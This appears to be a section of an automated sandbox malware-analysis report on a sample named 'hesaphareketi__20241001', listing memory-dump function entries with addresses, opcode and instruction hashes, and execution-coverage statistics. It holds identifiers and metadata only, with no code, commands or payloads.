                                        Function 07575088 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V3~
                                        • API String ID: 0-1917302123
                                        • Opcode ID: aa7ba0cb3b7e080acec4448b6923ade8c0ab176ebcfc3537c288ac70db9ed7fd
                                        • Instruction ID: 60b2907cc4c4c73b545e07188dbcb437d32409a36e5cb6df34d41a7e9732909c
                                        • Opcode Fuzzy Hash: aa7ba0cb3b7e080acec4448b6923ade8c0ab176ebcfc3537c288ac70db9ed7fd
                                        • Instruction Fuzzy Hash: D45137B0E152198FDB08CFA9D9405EEFBF2FB89301F14D52AD419B7254E7348A51CBA4
                                        Function 07578B70 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4$VD
                                        • API String ID: 0-4229505421
                                        • Opcode ID: 173ea2d659763846e7cf3e649ab32478aa1c56bed47f732aa5c5526d71ee4c67
                                        • Instruction ID: 3f9592e00b732224c089e19c51d873765499dadc078348cfcc25d2a1a51a06ea
                                        • Opcode Fuzzy Hash: 173ea2d659763846e7cf3e649ab32478aa1c56bed47f732aa5c5526d71ee4c67
                                        • Instruction Fuzzy Hash: AB41F8B0D1160A8FCB48CFAAD5855EEFBF6BF88300F14C42AC419A7254D734AA41CF95
                                        Function 07578B62 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4$VD
                                        • API String ID: 0-4229505421
                                        • Opcode ID: c54459a76dfe957ef6a8148efd160c52668fb13ca3ef030df9c46dff12d9eae8
                                        • Instruction ID: c51cb2ff106270bf704894bdb7e331b59308adaa1f7c82c7a2edd28ca8175830
                                        • Opcode Fuzzy Hash: c54459a76dfe957ef6a8148efd160c52668fb13ca3ef030df9c46dff12d9eae8
                                        • Instruction Fuzzy Hash: BC41F7B0E1560A8FCB44CFAAD5855EEFBF2BF88310F14C46AC419A7254D734AA42CF91
                                        Function 055D0040 Relevance: .3, Instructions: 315COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5170b4dea8c8ddb1a519e8ca5be073727fbb5911ff8c1fc9a44b30119e3bcf12
                                        • Instruction ID: 939d043cd119b38caaa2e830c4a3ff714426482950691f55c7217eb75cdb01ac
                                        • Opcode Fuzzy Hash: 5170b4dea8c8ddb1a519e8ca5be073727fbb5911ff8c1fc9a44b30119e3bcf12
                                        • Instruction Fuzzy Hash: CE12A6B24117468BE732CF25ED4C18A7BB1FB81318F50670AD2622B2E9D7B4156BCF48
                                        Function 0757AE40 Relevance: .3, Instructions: 313COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15aa40d3df16ed5e4148fafbd14dacafdada2200eec0cb55de851d54234293b0
                                        • Instruction ID: 1bd2d3de831103f19109ce9cff3d9a7ef296fde1603768eb4f0ebcf3dbed88ea
                                        • Opcode Fuzzy Hash: 15aa40d3df16ed5e4148fafbd14dacafdada2200eec0cb55de851d54234293b0
                                        • Instruction Fuzzy Hash: FCD1D1B4E15219DBDB08CFAAD9805DEFBF2BF89300F14D92AD416AB224D7349942CF54
                                        Function 07A33D60 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7af18293e1ab0e392e98eda571f72d721d2fe9b7b4a2c9281d91fd15b1fc7c64
                                        • Instruction ID: 605705a9584d2b6528fc8866873328dde440d044c220937aa35943583279a04c
                                        • Opcode Fuzzy Hash: 7af18293e1ab0e392e98eda571f72d721d2fe9b7b4a2c9281d91fd15b1fc7c64
                                        • Instruction Fuzzy Hash: CDE1F7B4E041598FCB14DFA9C9809AEFBB2FF89305F248269E414AB356D735AD41CF60
                                        Function 07A31C88 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63ed3adf25f3d4ef3d42b49380ac888ac53bc3a244ca91036dba308f5bdfdb18
                                        • Instruction ID: 193a4b9f44079815e55fab50709f34e2caad80c26bbe4d764e285f0e72330b0b
                                        • Opcode Fuzzy Hash: 63ed3adf25f3d4ef3d42b49380ac888ac53bc3a244ca91036dba308f5bdfdb18
                                        • Instruction Fuzzy Hash: 29E1F6B4E001198FCB14DFA9C9909AEBBB2FF89305F24C269E414AB356D735AD41CF60
                                        Function 07A34270 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e3693bf270204b9f81001a506694d4c53c7304c56d8e252f5194847290203d0
                                        • Instruction ID: 9869953c94c23e48093fdfd5ae7a92ef9a9cc21dd5443af5f545b1d6e3ceabb8
                                        • Opcode Fuzzy Hash: 8e3693bf270204b9f81001a506694d4c53c7304c56d8e252f5194847290203d0
                                        • Instruction Fuzzy Hash: BFE1F6B4E001598FCB14DFA9C9809AEFBB2FF89305F248169E814AB356D734AD41CF61
                                        Function 07A320C0 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bb80f50ad92b3f99f6f3b1de7591b125d0f5798743a62f7f4e5ab7d97b92cf50
                                        • Instruction ID: b004f069472f0b5cd29a8ddaefc97ef54c1eeb1de0e99cf44f08789f7293219a
                                        • Opcode Fuzzy Hash: bb80f50ad92b3f99f6f3b1de7591b125d0f5798743a62f7f4e5ab7d97b92cf50
                                        • Instruction Fuzzy Hash: 54E1D8B4E002198FDB14DF99C980AAEFBB2FF89305F248169E454A7356D734A941CF61
                                        Function 07A31850 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 81578e1d1bfbc3cbd807a19bc6706a280b65a14b719b2210ff805d2b9a62a9a2
                                        • Instruction ID: 050f76f3c57a25160c45f792b92ebf9037e565a85b02e02fee57b1ca9a13ed87
                                        • Opcode Fuzzy Hash: 81578e1d1bfbc3cbd807a19bc6706a280b65a14b719b2210ff805d2b9a62a9a2
                                        • Instruction Fuzzy Hash: FBE1E7B4E006198FCB14DFA9C9809AEBBB2FF89305F24C169E414AB356D734AD41CF61
                                        Function 0757AE30 Relevance: .3, Instructions: 311COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f526c10ed2348ab1c7f818b2d9db8ccb9685428bea87e3ab507588086c74d91
                                        • Instruction ID: 8e2023fce45d89a70433168d745901351281c2275aaf12a599cc78d3ad9c6674
                                        • Opcode Fuzzy Hash: 2f526c10ed2348ab1c7f818b2d9db8ccb9685428bea87e3ab507588086c74d91
                                        • Instruction Fuzzy Hash: 47D1E3B0E15219DBDB08CFAAD9805DEFBF2BF89300F14D92AD416AB264D7349942CF54
                                        Function 015DD5BC Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2148404329.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_15d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d7188bc222af8d0d0497fa49eb6fa164eb7e59ba5547657a7cc246c386ce588
                                        • Instruction ID: 554f4b8f664e06b154c06f587f6a1095dac27e5864e7ea7cff0b5076469ba9a3
                                        • Opcode Fuzzy Hash: 7d7188bc222af8d0d0497fa49eb6fa164eb7e59ba5547657a7cc246c386ce588
                                        • Instruction Fuzzy Hash: D8A17F36E00616CFCF25DFB8C84059EBBB2FF85300B15856AE906AF265DB71E956CB40
                                        Function 075729A8 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d51d6e8be1229d38b0079a78f2775ac579bd776f6f1ec0eb80fb4eafb0000716
                                        • Instruction ID: 38a665a6f4afb3117480e45c09ccec9af36330d163a63b29eb3f931409d0c6e4
                                        • Opcode Fuzzy Hash: d51d6e8be1229d38b0079a78f2775ac579bd776f6f1ec0eb80fb4eafb0000716
                                        • Instruction Fuzzy Hash: CAD1C43182065ACACB11EF64D994A9DF7B1FF95300F10D7AAD0497B260EF746AC9CB81
                                        Function 075729A2 Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c069d6ff460b06236c4415a06893ea1103de6e36d19d92095055e08745a10fdf
                                        • Instruction ID: e73cb1c54560be18a8c81739087eccd3dddb2a037f0880b0b64a1c781ddbc9ac
                                        • Opcode Fuzzy Hash: c069d6ff460b06236c4415a06893ea1103de6e36d19d92095055e08745a10fdf
                                        • Instruction Fuzzy Hash: F7D1C431C2065ACACB11EF64D994A9DB7B1FF95300F10D7AAD0497B260EF746AC9CB81
                                        Function 07579900 Relevance: .3, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f7a4e1c9fbc57ef300342f71b8febbac9a1b81bb070db362c8ce631fa6038a01
                                        • Instruction ID: 796512e89db436772f5029323aacb269d7abdb65763ffa7e29008bde52f4f1d8
                                        • Opcode Fuzzy Hash: f7a4e1c9fbc57ef300342f71b8febbac9a1b81bb070db362c8ce631fa6038a01
                                        • Instruction Fuzzy Hash: C7B128B0E152199FDB14CFA9D9809AEFBF6FF89300F24816AD408A7255D734AA41CF61
                                        Function 075798F0 Relevance: .2, Instructions: 243COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 083d6fd523b09fa0867d413b81c81944458bad8d3e0a73143ed232af03098fdd
                                        • Instruction ID: f5886fafcdb683c67286edc63e653bdc4491d0a9d129105a1f51e966b9a4fe5e
                                        • Opcode Fuzzy Hash: 083d6fd523b09fa0867d413b81c81944458bad8d3e0a73143ed232af03098fdd
                                        • Instruction Fuzzy Hash: 4CB128B0E152199FDB14CFA9D98099EFBF6BF89300F24C16AD408A7355D734AA41CF61
                                        Function 055D0006 Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2163631232.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_55d0000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 794d2db6bacc96a87ff0947b41d656d748cbe853d380b04a2d3beacff460239b
                                        • Instruction ID: de0de564d7a3403c526c078c51f8d5e66bf490eae223b3e49f9e56f5838d9804
                                        • Opcode Fuzzy Hash: 794d2db6bacc96a87ff0947b41d656d748cbe853d380b04a2d3beacff460239b
                                        • Instruction Fuzzy Hash: 1EC12AB2411746CBD722CF64EC4C18A7BB1FB85318F50671AD1626B2E9DBB8146BCF48
                                        Function 075799AB Relevance: .2, Instructions: 211COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: add11998b36c9c0ae549e61339ff980060a023d47e73edc51ddfca51b1635802
                                        • Instruction ID: 21add4d784631108e570582aa41951becf17d1c6d370261640a4219fb3156dc2
                                        • Opcode Fuzzy Hash: add11998b36c9c0ae549e61339ff980060a023d47e73edc51ddfca51b1635802
                                        • Instruction Fuzzy Hash: 42A138B4E152299FCB10CFA8D58099EFBF2FF89304F249669D408A7255D734AE81CF60
                                        Function 07577900 Relevance: .2, Instructions: 178COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0bb6232beece0564cd13d4a7ffc46e80465e070c4c978b5ee3f739a21936b556
                                        • Instruction ID: 182e1269e99feec52acb54f77b17a0473a77fd6a053fb6e493f567ea25f97c78
                                        • Opcode Fuzzy Hash: 0bb6232beece0564cd13d4a7ffc46e80465e070c4c978b5ee3f739a21936b556
                                        • Instruction Fuzzy Hash: 0281D0B4E15219CFCB44CFA9E58499EFBF2FF49210F149959E419AB320D734AA42CF90
                                        Function 075778F0 Relevance: .2, Instructions: 174COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 14095db58614f2b52a85b35357364d9661238fac56074446d235ae4a8bd8d28e
                                        • Instruction ID: d3a79f5acb79ae14fa2542383bca4397d79ef719811e38bbb01f85b127696ba5
                                        • Opcode Fuzzy Hash: 14095db58614f2b52a85b35357364d9661238fac56074446d235ae4a8bd8d28e
                                        • Instruction Fuzzy Hash: DB71D1B4E15209CFCB44CFA9D58499EFBF2FF49210F149969E419AB320D734AA42CF50
                                        Function 07A3180B Relevance: .2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 529424f74cb08325efe9767815b2b56a29689358c0b3ee29b346a275c7986848
                                        • Instruction ID: 1d89fd2f7f29af9b7bc6d1148548b905282ad110a24508648cceccaa6a74f261
                                        • Opcode Fuzzy Hash: 529424f74cb08325efe9767815b2b56a29689358c0b3ee29b346a275c7986848
                                        • Instruction Fuzzy Hash: DE514370D042198FDB15DF69C9805AEFBB2FF89304F24C16AD458A7256C7349A41CF61
                                        Function 075784D0 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 265404c0cb45ebd7b6145d7f00d81729070441efba1187d46ebf414d173186bd
                                        • Instruction ID: 117340df652be10ab8d08a20555466f5bac0fee20706b31830fe92de1c5f97c5
                                        • Opcode Fuzzy Hash: 265404c0cb45ebd7b6145d7f00d81729070441efba1187d46ebf414d173186bd
                                        • Instruction Fuzzy Hash: 5161E2B4E11219DFCB04CFA9E5859EEFBB2FB49310F149959D405AB314D730A942CFA4
                                        Function 075784C3 Relevance: .1, Instructions: 149COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eafbdafd80ccc08544cabec5969ade268ebb34f6be06c3c87f94af942c8b951
                                        • Instruction ID: 5a37e16f3366a3a8e55d87760ac8d63dbee45013a06891a59c9ffa8c81ffdac5
                                        • Opcode Fuzzy Hash: 5eafbdafd80ccc08544cabec5969ade268ebb34f6be06c3c87f94af942c8b951
                                        • Instruction Fuzzy Hash: CE5103B4E1121ADFCB04CFA9E5859EEFBF2FB89310F149956D405A7314D730AA41CB94
                                        Function 07A3425F Relevance: .1, Instructions: 135COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ea9544b7854b3d56b1c986f4b19b54d34755f1918ea5a981aceecf881d5ae082
                                        • Instruction ID: daaa4d6f2bfee55b13b620d5771ecf40df349f14962d7dffba4b0f8554ae2393
                                        • Opcode Fuzzy Hash: ea9544b7854b3d56b1c986f4b19b54d34755f1918ea5a981aceecf881d5ae082
                                        • Instruction Fuzzy Hash: D9510CB4E002598FDB14DFA9C9805AEFBF2FF89304F24C16AD458A7216D7349A42CF61
                                        Function 07A31C78 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ebfce85e4e91ff6a87d02b0d5cc7151534011ecef56e2ccf7b114fe21c37d3a
                                        • Instruction ID: db584ce3856453fa942d35b2685f65573f2f74ac003acf1a7c9c6ccda21d6d8d
                                        • Opcode Fuzzy Hash: 9ebfce85e4e91ff6a87d02b0d5cc7151534011ecef56e2ccf7b114fe21c37d3a
                                        • Instruction Fuzzy Hash: 38511AB4E006198FDB14DFA9C9805AEFBF2FF89304F24C169D458AB216D7359A41CFA1
                                        Function 07A320B0 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2171074597.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7a30000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec08a0a4f1ee16b748a2930ec5ee34c52bd1c6bbcf25690675a6c351872b9385
                                        • Instruction ID: f5cf8e0013623c24afc31080752b39f83b536148f9a78e71e9e366c1ae2542cb
                                        • Opcode Fuzzy Hash: ec08a0a4f1ee16b748a2930ec5ee34c52bd1c6bbcf25690675a6c351872b9385
                                        • Instruction Fuzzy Hash: 4C51FAB4E002198BDB14CFA9C9805AEFBF6FF89305F24C169D418A7256D7359E42CFA1
                                        Function 07578F70 Relevance: .1, Instructions: 120COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ca1989c005b38005bb68339c0ae6855637f71e4e449b2aa770908cb63befbd9d
                                        • Instruction ID: 39870b0dbb0702b8469e07c68b828b286e7c1c406de15b744f6f553da8ffc50f
                                        • Opcode Fuzzy Hash: ca1989c005b38005bb68339c0ae6855637f71e4e449b2aa770908cb63befbd9d
                                        • Instruction Fuzzy Hash: 765109B4E1520ADBCB04CFAAD5814EEFBB2FB99300F24D46AC405B7354D7349A42CB95
                                        Function 07578F6A Relevance: .1, Instructions: 115COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b6601c5effef862589c7fd0fcbc2c31b44e4f95b7f262281807f5d1b4d208718
                                        • Instruction ID: 3ecc98c5aee3f5e333d005344b5dcc5a6bbade2ceceefcf76c8fcb760593de9d
                                        • Opcode Fuzzy Hash: b6601c5effef862589c7fd0fcbc2c31b44e4f95b7f262281807f5d1b4d208718
                                        • Instruction Fuzzy Hash: 744137B4E1520A8BCB04CFA9D5804EEFBB2FF99310F24D46AC415B7354D734AA42CBA5
                                        Function 07577700 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47f37accd892a05ed9c2bda8ae7d4cf016bee1997db6e56cbff881682d00510b
                                        • Instruction ID: 9c7f2e97332fddf5e6e3d536b1d87e558ad48cafe188326815bc061dab091cc7
                                        • Opcode Fuzzy Hash: 47f37accd892a05ed9c2bda8ae7d4cf016bee1997db6e56cbff881682d00510b
                                        • Instruction Fuzzy Hash: EC412BB0E1510ADFCB08CFA9E5804AEFBB2FF89200F60D999C015AB304D7309A41CF94
                                        Function 075776F0 Relevance: .1, Instructions: 113COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e9b53c4983b75bc6e49deaf37cc3bf7748936d867f8c13b8f0c629328eb79013
                                        • Instruction ID: 11f930bffde125aba7f0a9b07f8886b43f6c1faca5334e1c3efb9aa0d67942b3
                                        • Opcode Fuzzy Hash: e9b53c4983b75bc6e49deaf37cc3bf7748936d867f8c13b8f0c629328eb79013
                                        • Instruction Fuzzy Hash: 2F412AB0E1510ADFCB08CFA9E4805AEFBB2FF89200F64D9A9C415AB345D7309A41CF95
                                        Function 07573918 Relevance: .1, Instructions: 82COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6d714b0918e259a547a06e9af18dabd4edad8f251acef77d8480e70817e7798
                                        • Instruction ID: 90cf48e5b9de2f6b205c44adb94797ddfc388608608c04cece260a9f6b6a55c1
                                        • Opcode Fuzzy Hash: e6d714b0918e259a547a06e9af18dabd4edad8f251acef77d8480e70817e7798
                                        • Instruction Fuzzy Hash: E03118B1E116189BDB58CFABD8416DEFBF3BFC9210F14C56AD408A6214EB305985CF61
                                        Function 07573908 Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2169849677.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7570000_hesaphareketi__20241001.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8c40029af4e9701e05f803550c44c9e1b22b8d0cba7e6c6b26819f322dcfd447
                                        • Instruction ID: a222285a46bdc76aa6096d815f13bbb5edbbe60ada9ef182991590460d70dd9a
                                        • Opcode Fuzzy Hash: 8c40029af4e9701e05f803550c44c9e1b22b8d0cba7e6c6b26819f322dcfd447
                                        • Instruction Fuzzy Hash: C5313AB1E016588BDB08CFABD8446DEFBF3BFC8210F04C16AC408A6224EB305945CF61

                                        Execution Graph

                                        Execution Coverage:10.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:71
                                        Total number of Limit Nodes:8
